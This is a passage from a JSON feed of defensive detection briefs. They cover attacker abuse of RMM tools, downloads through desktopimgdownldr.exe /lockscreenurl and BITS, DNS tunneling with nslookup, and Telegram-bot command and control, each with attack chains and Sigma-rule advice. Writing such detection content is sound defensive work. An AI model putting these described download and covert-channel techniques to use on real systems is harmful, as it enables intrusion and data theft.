commands, transfer files, or perform other malicious activities on the compromised host.\u003c/li\u003e\n\u003cli\u003eThe attacker may use the RMM tool for lateral movement, pivoting to other systems within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, 
which could include data exfiltration, ransomware deployment, or maintaining persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromise via abused RMM software can lead to full system compromise, data theft, or deployment of ransomware. While the number of affected victims is unknown, the sectors most likely to be impacted include any organization that relies on RMM tools for IT management. Successful exploitation allows attackers to bypass traditional security controls by using legitimate software, making detection more challenging.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;DNS Queries to Known RMM Domains from Non-Browser Processes\u0026rdquo; to your SIEM and tune the RMM domain list for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on identifying the process responsible for the DNS query and its parent process.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized RMM tools.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon DNS event logging to ensure the necessary data is available for the detection rule.\u003c/li\u003e\n\u003cli\u003eCorrelate with other alerts to identify potential compromises.\u003c/li\u003e\n\u003cli\u003eReview process.code_signature for trusted RMM publishers and investigate any unsigned or unexpected signers.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-rmm-dns-non-browser/","summary":"Detection of DNS queries to remote monitoring and management (RMM) domains from non-browser processes indicating potential misuse of legitimate remote access tools for command and control.","title":"Suspicious DNS Queries to RMM Domains from Non-Browser 
Processes","url":"https://feed.craftedsignal.io/briefs/2024-01-rmm-dns-non-browser/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Sysmon","Chrome","Edge","Firefox","Safari","Brave Browser","Opera Browser","Vivaldi Browser","WebView2"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","rmm","dns"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","Mozilla","Apple","Brave","Opera","Vivaldi"],"content_html":"\u003cp\u003eThis detection identifies potentially malicious use of Remote Monitoring and Management (RMM) tools by detecting DNS queries to known RMM domains originating from processes that are not web browsers. Attackers frequently abuse legitimate RMM software for command and control, persistence, and lateral movement within compromised networks. This rule focuses on surfacing RMM clients, scripts, or other non-browser activity contacting these services, thereby increasing the likelihood of detecting unauthorized remote access or malicious activity. The rule aims to reduce false positives by excluding common browser processes and focusing on unusual network activity. The identified domains are associated with various RMM tools like TeamViewer, AnyDesk, and ScreenConnect. 
This detection is relevant for organizations concerned about insider threats, supply chain attacks, or general compromise leading to unauthorized remote access.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system, possibly through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker installs an unauthorized RMM tool (e.g., using a script or installer).\u003c/li\u003e\n\u003cli\u003eThe RMM tool initiates a DNS query to resolve its command and control domain (e.g., teamviewer.com).\u003c/li\u003e\n\u003cli\u003eThe system, now running the RMM agent, establishes a connection to the attacker-controlled RMM server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RMM tool to execute commands on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RMM tool for lateral movement within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RMM tool to maintain persistence on the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromise via unauthorized RMM tools can provide attackers with persistent remote access, enabling them to perform a range of malicious activities, including data theft, ransomware deployment, and further lateral movement within the network. Successful exploitation can lead to significant financial loss, reputational damage, and disruption of business operations. 
The number of affected systems can vary depending on the scope of the initial compromise and the attacker\u0026rsquo;s ability to move laterally.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eRMM Domain DNS Queries from Non-Browser Processes\u003c/code\u003e to your SIEM and tune it to your environment, excluding legitimate non-browser processes that use RMM tools.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the rule, focusing on identifying the process making the DNS query and its parent process, as outlined in the rule\u0026rsquo;s description.\u003c/li\u003e\n\u003cli\u003eMonitor DNS query logs for queries to the RMM domains listed in the IOC table, and block them at the DNS resolver if unauthorized RMM use is confirmed.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 22 (DNS Query) logging to provide the necessary data for this detection, as recommended in the \u0026ldquo;Setup\u0026rdquo; section of the content.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-rmm-domain-dns/","summary":"Detects DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains from non-browser processes, potentially indicating unauthorized remote access or command and control activity.","title":"RMM Domain DNS Queries from Non-Browser Processes","url":"https://feed.craftedsignal.io/briefs/2024-01-rmm-domain-dns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR"],"_cs_severities":["medium"],"_cs_tags":["command and control","rmm","msi","windows","remote access"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies a suspicious sequence of events where an MSI installer is executed, followed by the launch of remote management 
software (RMM) such as ScreenConnect, Syncro, or VNC. Attackers may leverage this technique to gain unauthorized access to systems by first installing malicious software via an MSI package, and then using the RMM software to establish a remote connection. The rule specifically looks for msiexec.exe being run with an install argument (/i) followed by the execution of known RMM tools within a short timeframe. This behavior is often indicative of malicious actors attempting to establish persistent remote access to compromised machines. The detection is designed for Windows environments and covers a range of data sources including Elastic Defend, Sysmon, SentinelOne, Microsoft Defender XDR, and Crowdstrike.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system through various means (e.g., social engineering, compromised website, or existing malware).\u003c/li\u003e\n\u003cli\u003eThe attacker deploys a malicious MSI installer to the victim machine. This can be done through phishing attachments or drive-by downloads.\u003c/li\u003e\n\u003cli\u003eThe user executes the MSI installer (msiexec.exe) with an installation argument (/i or -i). The parent process is typically explorer.exe or sihost.exe, indicating user-initiated installation.\u003c/li\u003e\n\u003cli\u003eThe MSI installer executes, potentially installing malware or modifying system settings.\u003c/li\u003e\n\u003cli\u003eWithin one minute of the MSI installation, a remote management software (RMM) client is launched, such as ScreenConnect.ClientService.exe, Syncro.Installer.exe, tvnserver.exe, or winvnc.exe.\u003c/li\u003e\n\u003cli\u003eThe RMM client attempts to establish an outbound connection to a remote server controlled by the attacker, often using pre-configured access keys.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access to the compromised system via the RMM client. 
In the case of ScreenConnect, the attacker may use a guest link with a known session key.\u003c/li\u003e\n\u003cli\u003eThe attacker performs malicious activities, such as data exfiltration, lateral movement, or installing additional malware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to gain persistent remote access to compromised systems. This can lead to data theft, financial fraud, or disruption of services. Depending on the scope of the initial access, the attacker may be able to move laterally within the network, compromising additional systems. The use of RMM software can mask malicious activity as legitimate remote support, making detection more difficult.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging via Sysmon or Windows Security Event Logs to capture the execution of msiexec.exe and RMM tools.\u003c/li\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Remote Management Access Launch After MSI Install\u0026rdquo; Sigma rule to your SIEM and tune the timeframe (maxspan) to suit your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule, focusing on the source of the MSI file and the destination of the RMM connection.\u003c/li\u003e\n\u003cli\u003eBlock the execution of unauthorized RMM software on your network based on process name, as identified in the rule (ScreenConnect.ClientService.exe, Syncro.Installer.exe, tvnserver.exe, winvnc.exe).\u003c/li\u003e\n\u003cli\u003eMonitor network connections for RMM software connecting to unusual or external IPs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-rmm-after-msi/","summary":"Detects an MSI installer execution followed by the execution of commonly abused Remote Management Software like ScreenConnect, 
potentially indicating abuse where an attacker triggers an MSI install then connects via a guest link with a known session key.","title":"Remote Management Access Launch After MSI Install","url":"https://feed.craftedsignal.io/briefs/2024-01-rmm-after-msi/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","file-download","windows","desktopimgdownldr"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThe \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e utility, a legitimate Windows tool for configuring lock screen and desktop images, can be misused by adversaries to download arbitrary files from remote locations. This is achieved by leveraging the \u003ccode\u003e/lockscreenurl\u003c/code\u003e argument followed by an HTTP or HTTPS URL. This technique allows attackers to bypass traditional download restrictions and can be used to retrieve malicious payloads, tools, or scripts directly onto a compromised system. This method is particularly effective because \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e is a signed Microsoft binary, potentially evading initial detection based on process name or file reputation. The detection rule was initially created in September 2020 and updated in May 2026. 
This technique is valuable for attackers seeking to transfer files without using common tools like \u003ccode\u003ecertutil\u003c/code\u003e, \u003ccode\u003epowershell\u003c/code\u003e, or \u003ccode\u003ebitsadmin\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the target system through an existing vulnerability, credential compromise, or social engineering.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e with the \u003ccode\u003e/lockscreenurl\u003c/code\u003e argument, specifying a URL from which to download a malicious file.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e initiates an HTTP or HTTPS request to the specified URL.\u003c/li\u003e\n\u003cli\u003eThe remote server responds with the file content, which \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e saves to disk.\u003c/li\u003e\n\u003cli\u003eThe attacker then executes the downloaded file (e.g., a malicious script or executable).\u003c/li\u003e\n\u003cli\u003eThe malicious code performs actions such as establishing persistence, escalating privileges, or deploying further malware.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised system to move laterally within the network, accessing sensitive data and systems.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration, ransomware deployment, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to download and execute arbitrary files on a Windows system, leading to potential compromise of the host and the network. This can result in data theft, system damage, or ransomware infection. 
Due to the legitimate nature of the \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e utility, this technique can bypass security controls and detection mechanisms, increasing the likelihood of successful exploitation. While the exact number of victims is unknown, any Windows system where an attacker can execute commands is potentially vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Remote File Download via Desktopimgdownldr Utility\u0026rdquo; to your SIEM to detect the execution of \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e with the \u003ccode\u003e/lockscreenurl\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e to identify suspicious command-line arguments.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to ensure sufficient data is available for the provided Sigma rules.\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of \u003ccode\u003edesktopimgdownldr.exe\u003c/code\u003e downloading files from external URLs to determine if they are malicious.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized or unknown executables in sensitive environments.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-desktopimgdownldr-remote-file-copy/","summary":"The desktopimgdownldr utility can be abused to download remote files, potentially bypassing standard download restrictions and acting as an alternative to certutil for malware or tool deployment.","title":"Remote File Download via Desktopimgdownldr Utility","url":"https://feed.craftedsignal.io/briefs/2024-01-desktopimgdownldr-remote-file-copy/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["M365 
Defender","Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["dns-tunneling","command-and-control","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eAttackers can abuse DNS protocol for command and control and/or data exfiltration by exploiting network rules that allow DNS communication with external resources. This technique, known as DNS tunneling, involves encoding data within DNS queries to transmit commands, malicious files, or exfiltrate sensitive information to attacker-controlled DNS servers. Detection focuses on identifying anomalous patterns of nslookup.exe usage, specifically a high volume of executions with explicit query types originating from a single host within a short timeframe. This activity may bypass traditional security controls that monitor standard network traffic, enabling covert communication channels.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises a host within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003enslookup.exe\u003c/code\u003e to perform DNS queries with specific query types (e.g., \u003ccode\u003e-querytype=TXT\u003c/code\u003e, \u003ccode\u003e-qt=A\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker encodes data (commands, files, or exfiltrated data) into the DNS query.\u003c/li\u003e\n\u003cli\u003eThe compromised host sends multiple DNS requests to a rogue DNS server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker receives the DNS queries and decodes the data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the tunneled command to further compromise the internal network.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates data to the attacker-controlled server.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful DNS 
tunneling allows attackers to establish covert communication channels, bypassing traditional security measures. This can lead to command and control of compromised systems, exfiltration of sensitive data, and further propagation within the network. The impact includes potential data breaches, system compromise, and prolonged attacker presence due to the difficulty in detecting covert DNS traffic.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Nslookup DNS Tunneling Activity\u0026rdquo; to your SIEM to detect potential DNS tunneling attempts.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture \u003ccode\u003enslookup.exe\u003c/code\u003e executions and their command-line arguments.\u003c/li\u003e\n\u003cli\u003eInspect network traffic logs for unusually high volumes of DNS queries originating from individual hosts.\u003c/li\u003e\n\u003cli\u003eMonitor DNS query logs for encoded or unusual data patterns within DNS query names.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-dns-tunneling-nslookup/","summary":"Detection of multiple nslookup.exe executions with explicit query types from a single host, potentially indicating command and control activity via DNS tunneling, where attackers abuse DNS for data infiltration or exfiltration.","title":"Potential DNS Tunneling via NsLookup","url":"https://feed.craftedsignal.io/briefs/2024-01-dns-tunneling-nslookup/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["AeroAdmin","AnyDesk","AteraAgent","AweSun","APC Admin","APC Host","BeyondTrust Remote Support","Bomgar","Remote Support","B4-Service","CagService","Domotz Agent","dwagsvc","DWRCC","FleetDeck Commander","GetScreen","GoToAssist","GoToResolve","ImperoClient","ImperoServer","ISLLight","ISLLightClient","JumpCloud 
Agent","Level","LvAgent","LMIIgnition","LogMeIn","Lunixar","ManageEngine Remote Access Plus","MeshAgent","Mikogo","NinjaRMM","parsec","PService","Radmin","RealVNC","RemotePC","RemoteDesktopManager","RCClient","RCService","RPCSuite","RustDesk","RemoteUtilities","saazapsc","ScreenConnect","Splashtop","Supremo","Syncro","TacticalRMM","Tailscale","TeamViewer","Tiflux","ToDesk","Twingate","TightVNC","UltraVNC","UltraViewer","AnyAssist","Velociraptor","ToolsIQ","ZohoAssist"],"_cs_severities":["medium"],"_cs_tags":["remote-access-tool","command-and-control","rmm","windows"],"_cs_type":"advisory","_cs_vendors":["AeroAdmin","AnyDesk","Atera","AweSun","APC","BeyondTrust","BarracudaRMM","Domotz","DWService","FleetDeck","GetScreen","GoTo","Impero","ISLOnline","JumpCloud","Level","LogMeIn","Lunixar","ManageEngine","MeshCentral","Mikogo","NinjaOne","Parsec","Pulseway","Radmin","RealVNC","RemotePC","Devolutions","RPCSuite","RustDesk","RemoteUtilities","Kaseya","ScreenConnect","Splashtop","Supremo","TacticalRMM","Tailscale","TeamViewer","Tiflux","ToDesk","Twingate","TightVNC","UltraVNC","UltraViewer","AnyAssist","Velociraptor","ToolsIQ","ZohoAssist"],"content_html":"\u003cp\u003eThis detection rule identifies Windows systems running multiple Remote Monitoring and Management (RMM) tools from different vendors within an eight-minute timeframe. While legitimate MSP environments might utilize several tools, the presence of multiple RMM solutions on a single host can signify a compromise, unauthorized software installation (shadow IT), or attackers establishing redundant access points. The rule maps process names to vendor labels to avoid inflated counts from multiple binaries of the same vendor. This activity has been observed as a component of broader attack campaigns, including those leveraging compromised MSP infrastructure, and is described in CISA AA23-025A. 
The timeframe analyzed is \u0026ldquo;now-9m\u0026rdquo;, and the rule triggers if two or more different vendors are detected.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: The attacker gains initial access to the system, possibly through phishing, exploiting vulnerabilities, or stolen credentials.\u003c/li\u003e\n\u003cli\u003eTool Deployment: The attacker deploys an initial RMM tool (e.g., AnyDesk, TeamViewer) for remote access and control.\u003c/li\u003e\n\u003cli\u003ePersistence: The attacker establishes persistence by configuring the RMM tool to start automatically on system boot.\u003c/li\u003e\n\u003cli\u003eLateral Movement: The attacker uses the initial access to discover other systems on the network.\u003c/li\u003e\n\u003cli\u003eAdditional RMM Deployment: The attacker deploys a second RMM tool (e.g., ScreenConnect, Splashtop) from a different vendor to create a redundant access method.\u003c/li\u003e\n\u003cli\u003ePrivilege Escalation: The attacker escalates privileges using the compromised RMM tools, if necessary.\u003c/li\u003e\n\u003cli\u003eRemote Control: The attacker uses the RMM tools to remotely control the system, execute commands, and access sensitive data.\u003c/li\u003e\n\u003cli\u003eData Exfiltration or Further Exploitation: The attacker exfiltrates sensitive data or uses the compromised system to launch further attacks on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack leveraging multiple RMM tools can result in unauthorized access to sensitive data, system compromise, and lateral movement within the network. The presence of multiple RMM tools increases the attacker\u0026rsquo;s resilience, making it harder to detect and remediate the intrusion. Affected systems can be used as a staging ground for further attacks, leading to significant financial and reputational damage. 
This can impact any Windows-based system, and the CISA advisory AA23-025A specifically highlights the risk of MSP infrastructure compromise.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eMultiple RMM Vendors on Same Host\u003c/code\u003e to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate hosts triggering the rule to confirm legitimate use of multiple RMM tools. Check \u003ccode\u003eEsql.vendors_seen\u003c/code\u003e and \u003ccode\u003eEsql.processes_name_values\u003c/code\u003e for insight into the involved tools.\u003c/li\u003e\n\u003cli\u003eReview asset inventory and change tickets to verify authorized RMM software installations.\u003c/li\u003e\n\u003cli\u003eIsolate any unauthorized or unexplained hosts and remove unapproved RMM tools.\u003c/li\u003e\n\u003cli\u003eEnforce a single approved RMM stack per asset class where possible.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) on Windows endpoints to enhance detection capabilities as described in the rule\u0026rsquo;s setup instructions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-multiple-rmm-vendors/","summary":"This rule identifies Windows hosts where two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed starting processes within the same eight-minute window, potentially indicating compromise, shadow IT, or attacker staging of redundant access.","title":"Multiple Remote Management Tool Vendors on Same Host","url":"https://feed.craftedsignal.io/briefs/2024-01-multiple-rmm-vendors/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Background Intelligent Transfer Service (BITS)","Adobe Reader","Docker 
Desktop"],"_cs_severities":["low"],"_cs_tags":["bits","ingress-transfer","command-and-control","defense-evasion","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Adobe","Docker"],"content_html":"\u003cp\u003eThe Windows Background Intelligent Transfer Service (BITS) is a legitimate Windows service that allows for prioritized, asynchronous, and throttled transfer of files between a client and a server. Adversaries abuse BITS to download malicious payloads while evading typical security protections, as file transfers occur in the context of the \u003ccode\u003esvchost.exe\u003c/code\u003e process. This activity can obscure the origin of the download and bypass application whitelisting rules. This detection focuses on identifying file rename events where \u003ccode\u003esvchost.exe\u003c/code\u003e renames temporary BITS files (BIT*.tmp) to executable or archive file types, indicating a potential malicious download via BITS. This technique is commonly employed to deliver malware, exfiltrate data, or download additional tools.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses a script or command-line interface (e.g., PowerShell) to create a BITS job.\u003c/li\u003e\n\u003cli\u003eThe BITS job is configured to download a malicious executable or archive from a remote server using the \u003ccode\u003ebitsadmin.exe\u003c/code\u003e utility.\u003c/li\u003e\n\u003cli\u003eBITS downloads the file to a temporary location on the system with a \u003ccode\u003eBIT*.tmp\u003c/code\u003e extension.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esvchost.exe\u003c/code\u003e process renames the temporary file to its final name and extension (e.g., .exe, .zip).\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded file, initiating further malicious 
activities.\u003c/li\u003e\n\u003cli\u003eThe malware establishes persistence through registry keys or scheduled tasks.\u003c/li\u003e\n\u003cli\u003eThe malware communicates with a command and control (C2) server to receive instructions and exfiltrate data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation enables attackers to download and execute arbitrary code on compromised systems. The use of BITS can bypass traditional security measures, leading to malware infections, data theft, and potentially full system compromise. This technique can be used in conjunction with other attack vectors to establish a persistent foothold within the network. While the rule itself triggers at low severity, the identified activity can be an early warning of more severe attack stages.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Ingress Transfer via Windows BITS\u0026rdquo; Sigma rule to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon file creation and process creation logging to enhance visibility into BITS-related activities.\u003c/li\u003e\n\u003cli\u003eMonitor network connections initiated by \u003ccode\u003esvchost.exe\u003c/code\u003e to identify potentially malicious downloads.\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of \u003ccode\u003ebitsadmin.exe\u003c/code\u003e being executed, especially with command-line arguments indicative of suspicious downloads.\u003c/li\u003e\n\u003cli\u003eReview \u003ccode\u003eMicrosoft-Windows-Bits-Client/Operational\u003c/code\u003e Windows logs (event ID 59) for unusual BITS events.\u003c/li\u003e\n\u003cli\u003eBlock known malicious domains or IP addresses associated with BITS-related attacks at the firewall or DNS 
resolver.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-bits-ingress-transfer/","summary":"Adversaries may leverage Windows Background Intelligent Transfer Service (BITS) to download executable and archive files to evade defenses and establish command and control.","title":"Ingress Transfer via Windows BITS","url":"https://feed.craftedsignal.io/briefs/2024-01-bits-ingress-transfer/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk Cloud"],"_cs_severities":["high"],"_cs_tags":["telegram","command-and-control","dns","windows"],"_cs_type":"advisory","_cs_vendors":["Splunk"],"content_html":"\u003cp\u003eThis alert identifies systems querying the Telegram API domain (api.telegram.org) using processes other than the legitimate Telegram application. Threat actors frequently leverage Telegram bots for C2, due to their ease of use, encryption, and widespread availability. Malware can use these bots to receive commands, exfiltrate data, or perform other malicious activities. Detecting DNS queries for Telegram\u0026rsquo;s API from unexpected processes can uncover compromised systems or unauthorized use of Telegram for covert communication. 
The detection focuses on non-standard Telegram clients resolving the api.telegram.org domain to filter out legitimate Telegram application traffic and focus on suspicious processes.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user inadvertently downloads and executes a malicious payload (e.g., via phishing or drive-by download).\u003c/li\u003e\n\u003cli\u003eThe malware establishes persistence on the system (e.g., via registry keys or scheduled tasks).\u003c/li\u003e\n\u003cli\u003eThe malware initiates a DNS query to resolve api.telegram.org to identify the Telegram API server IP address.\u003c/li\u003e\n\u003cli\u003eThe malware establishes a communication channel with a Telegram bot controlled by the attacker using the resolved IP address.\u003c/li\u003e\n\u003cli\u003eThe attacker sends commands to the bot, which are relayed to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe malware executes the received commands, potentially including data exfiltration or further malicious actions.\u003c/li\u003e\n\u003cli\u003eThe malware exfiltrates sensitive data to the attacker via the Telegram bot.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistent access and control over the compromised system via the Telegram bot.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised systems can be remotely controlled by attackers, leading to data theft, system disruption, or further propagation of malware within the network. The use of Telegram bots enables covert communication, making it difficult to detect malicious activity using traditional methods. Multiple threat actors employ Telegram-based C2, including those associated with information stealers, keyloggers, and crypto-mining malware. 
A successful attack can lead to significant data breaches and financial losses.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Telegram DNS Queries\u003c/code\u003e to your SIEM to identify processes making DNS queries to the Telegram API (api.telegram.org) other than the legitimate Telegram application.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule by examining the process execution history, network connections, and related system activity.\u003c/li\u003e\n\u003cli\u003eBlock the domain \u003ccode\u003eapi.telegram.org\u003c/code\u003e at the DNS resolver or firewall to prevent compromised systems from communicating with Telegram bots, unless legitimate business use requires it.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 22 (DNS Query) logging to capture DNS query events on endpoints.\u003c/li\u003e\n\u003cli\u003eUpdate Sysmon to at least version 6.0.4 to ensure comprehensive DNS event logging.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-03-telegram-dns-query/","summary":"Detection of a process making DNS queries to the Telegram API domain, which is indicative of malware utilizing Telegram bots for command and control (C2) communications.","title":"Suspicious DNS Queries to Telegram API by Non-Telegram Processes","url":"https://feed.craftedsignal.io/briefs/2024-01-03-telegram-dns-query/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel","TeamViewer"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","remote-access","teamviewer"],"_cs_type":"advisory","_cs_vendors":["Elastic","SentinelOne"],"content_html":"\u003cp\u003eAttackers sometimes transfer malicious tools into a compromised environment using the command and control channel, but 
